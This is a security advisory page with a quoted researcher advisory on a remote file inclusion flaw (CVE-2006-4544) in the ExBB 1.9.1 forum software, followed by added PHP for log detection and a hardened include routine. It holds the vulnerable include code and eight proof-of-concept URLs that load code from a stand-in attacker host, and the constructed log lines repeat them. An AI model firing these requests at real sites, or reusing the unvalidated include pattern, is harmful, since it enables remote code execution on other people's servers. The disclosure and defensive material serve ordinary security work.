SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   ExBB
Vendors:   exbb.net
ExBB Include File Bug in 'exbb[home_path]' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016773
SecurityTracker URL:  http://securitytracker.com/id/1016773
CVE Reference:   CVE-2006-4544
Updated:  Jun 8 2008
Original Entry Date:  Aug 31 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.9.1
Description:   A vulnerability was reported in ExBB. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'exbb[home_path]' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The following files are affected:

/birstday/birst.php
/birstday/select.php
/birstday/profile_show.php
/newusergreatings/pm_newreg.php
/punish/p_error.php
/punish/profile.php
/threadstop/threadstop.php
/userstop/userstop.php

Some demonstration exploit URLs are provided:

http://[target]/[exbb_path]/modules/birstday/birst.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/birstday/select.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/birstday/profile_show.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/punish/p_error.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/punish/profile.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/threadstop/threadstop.php?exbb[home_path]=http://attacker.com/inject.txt?

http://[target]/[exbb_path]/modules/userstop/userstop.php?exbb[home_path]=http://attacker.com/inject.txt?

Ahmad Maulana a.k.a Matdhule reported this vulnerability.

The original advisory is available at:

http://advisories.echo.or.id/adv/adv46-matdhule-2006.txt

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.exbb.net/
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.
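The demonstration URLs above all share one shape: a request to a module script that carries a URL in the exbb[home_path] parameter. The following is an added example, not SecurityTracker's or ExBB's code, that scans Combined Log Format access-log lines for that shape; the log lines and the 203.0.113.x / 198.51.100.x addresses are constructed for the example, and the function name is_rfi_attempt() is an assumption.

```php
<?php
// Added example (not from the advisory): flag access-log requests whose
// exbb[home_path] parameter carries a URL scheme, the pattern used by the
// remote file inclusion requests shown on this page. Log lines are constructed.

function is_rfi_attempt(string $logLine): bool
{
    // Pull the request target out of a Combined Log Format line.
    if (!preg_match('/"(?:GET|POST|HEAD) ([^ "]+) HTTP\/[0-9.]+"/', $logLine, $m)) {
        return false;
    }
    $qpos = strpos($m[1], '?');
    if ($qpos === false) {
        return false;                   // no query string, nothing to inspect
    }
    // parse_str() URL-decodes keys and values and expands exbb[home_path]
    // (or its %5B/%5D-encoded form) into a nested array, just as PHP does
    // when it builds $_GET for the attacked script.
    parse_str(substr($m[1], $qpos + 1), $params);
    $value = $params['exbb']['home_path'] ?? null;
    if (!is_string($value)) {
        return false;
    }
    // A filesystem prefix used for include() must never start with a URL scheme.
    return (bool) preg_match('#^\s*[a-z][a-z0-9+.-]*://#i', $value);
}

// Constructed sample log: two inclusion attempts (one with encoded brackets
// and an ftp:// scheme) and one ordinary request to the same script.
$constructedLog = [
    '203.0.113.5 - - [31/Aug/2006:02:46:01 +0000] "GET /forum/modules/birstday/birst.php?exbb[home_path]=http://203.0.113.77/inject.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [31/Aug/2006:02:47:10 +0000] "GET /forum/modules/birstday/birst.php?exbb%5Bhome_path%5D=ftp%3A%2F%2F203.0.113.77%2Fx.txt%3F HTTP/1.1" 200 512 "-" "curl/7.15"',
    '198.51.100.2 - - [31/Aug/2006:02:48:00 +0000] "GET /forum/modules/birstday/birst.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

foreach ($constructedLog as $line) {
    echo (is_rfi_attempt($line) ? 'ALERT ' : 'ok    ') . substr($line, 0, 70) . PHP_EOL;
}
```

The check is deliberately keyed on the decoded parameter value rather than on a raw substring such as `home_path]=http`, so that percent-encoded keys and alternative schemes (ftp://, data:// and the like, all of which include() will honour when allow_url_include is on) are caught the same way. A response status of 200 on such a request is worth treating as a probable compromise rather than a blocked probe.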


 Source Message Contents

Date:  Thu, 31 Aug 2006 02:46:01 +0000
Subject:  [ECHO_ADV_46$2006] ExBB v1.9.1 (exbb[home_path]) Multiple Remote File

ECHO.OR.ID

------------------------------------------------------------------------------

[ECHO_ADV_46$2006] ExBB v1.9.1 (exbb[home_path]) Multiple Remote File Inclusion

------------------------------------------------------------------------------


Author		: Ahmad Maulana a.k.a Matdhule

Date Found	: August, 30th 2006

Location	: Indonesia, Jakarta

web		: http://advisories.echo.or.id/adv/adv46-matdhule-2006.txt

Critical Lvl	: Highly critical

Impact		: System access

Where		: From Remote

---------------------------------------------------------------------------


Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ExBB 1.9.1


Application	: ExBB

version		: 1.9.1

URL		: http://www.exbb.net


---------------------------------------------------------------------------


Vulnerability:

~~~~~~~~~~~~~~


In the birstday folder we found a vulnerable script, birst.php

---------------------------birst.php---------------------------------------

....

<?php

  $birstdayconf = array();

  // $exbb['home_path'] is not assigned anywhere in this script before it is
  // used as the include prefix, so a request parameter exbb[home_path]
  // (typically delivered through register_globals) supplies it.
  include ($exbb['home_path'].'modules/birstday/data/birstday_conf.php');

  include ($exbb['home_path'].'modules/birstday/language/'.$exbb['default_lang'].'/lang.php');

...

----------------------------------------------------------


Input passed to the "exbb['home_path']" parameter in birst.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.


Also affected files:

./select.php
./profile_show.php
../newusergreatings/pm_newreg.php
../punish/p_error.php
../punish/profile.php
../threadstop/threadstop.php
../userstop/userstop.php


Proof Of Concept:

~~~~~~~~~~~~~~~


http://target.com/[exbb_path]/modules/birstday/birst.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/birstday/select.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/birstday/profile_show.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/punish/p_error.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/punish/profile.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/threadstop/threadstop.php?exbb[home_path]=http://attacker.com/inject.txt?

http://target.com/[exbb_path]/modules/userstop/userstop.php?exbb[home_path]=http://attacker.com/inject.txt?


Solution:

~~~~~~~

- Sanitize variable $exbb['home_path'] on affected files.


---------------------------------------------------------------------------

Shoutz:

~~~

~ solpot a.k.a chris, J4mbi  H4ck3r thx for the hacking lesson    :)   

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous

~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama, BlueSpy, str0ke

~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com

~ Solpotcrew Comunity , #jambihackerlink #e-c-h-o @irc.dal.net

------------------------------------------------------------------------

---

Contact:

~~~~


     matdhule[at]gmail[dot]com


-------------------------------- [ EOF ]----------------------------------
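The advisory's solution line ("Sanitize variable $exbb['home_path'] on affected files") is the right idea; the following is an added example, not ExBB project code, of what that looks like for the birst.php include pattern quoted above. The constant EXBB_HOME_PATH, the functions safe_include_path() and safe_lang(), the two-letter language allow-list and the assumption that the script lives at <install root>/modules/birstday/ are all illustrative choices, not anything the project ships; the code assumes PHP 7 or later.

```php
<?php
// Added example, not ExBB code: rewrite of the birst.php include pattern so
// that the include prefix can never come from the request. EXBB_HOME_PATH,
// safe_include_path(), safe_lang() and the language list are assumptions.

// Vulnerable form quoted in the advisory (kept only as a comment):
//   include ($exbb['home_path'].'modules/birstday/data/birstday_conf.php');
// Nothing assigns $exbb['home_path'] before that line, so a request parameter
// exbb[home_path]=http://... can populate it and include() then fetches and
// executes whatever that URL returns.

// 1. Derive the install root from this script's own location (assumed to be
//    <root>/modules/birstday/), never from any variable that input can reach.
define('EXBB_HOME_PATH', realpath(__DIR__ . '/../..') . DIRECTORY_SEPARATOR);

// 2. Resolve every include target and insist that it stays under the root.
function safe_include_path(string $relative): string
{
    // Refuse URL schemes and traversal outright, before touching the filesystem.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $relative) || strpos($relative, '..') !== false) {
        throw new InvalidArgumentException("refused include path: $relative");
    }
    $full = realpath(EXBB_HOME_PATH . $relative);
    // realpath() is false for missing files and follows symlinks, so the prefix
    // test is made against the real on-disk location, not the string we built.
    if ($full === false || strncmp($full, EXBB_HOME_PATH, strlen(EXBB_HOME_PATH)) !== 0) {
        throw new InvalidArgumentException("include outside install root: $relative");
    }
    return $full;
}

// 3. The language directory also came from $exbb; map it through an allow-list
//    so it can only select one of the shipped language directories.
function safe_lang(?string $lang): string
{
    $allowed = ['en', 'ru'];            // constructed allow-list for the example
    return in_array($lang, $allowed, true) ? $lang : 'en';
}

$birstdayconf = array();
include safe_include_path('modules/birstday/data/birstday_conf.php');
include safe_include_path('modules/birstday/language/'
    . safe_lang($exbb['default_lang'] ?? null) . '/lang.php');
```

The prefix check in safe_include_path() is what turns "sanitize the variable" into an enforceable property: whatever string reaches include(), the resolved path must start with the install root. As defence in depth on the interpreter side, allow_url_include = Off (and, where the application does not need it, allow_url_fopen = Off) in php.ini stops include() from fetching URLs at all, and register_globals = Off removes the mechanism by which a query parameter becomes $exbb['home_path'] in the first place.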


Copyright 2014, SecurityGlobal.net LLC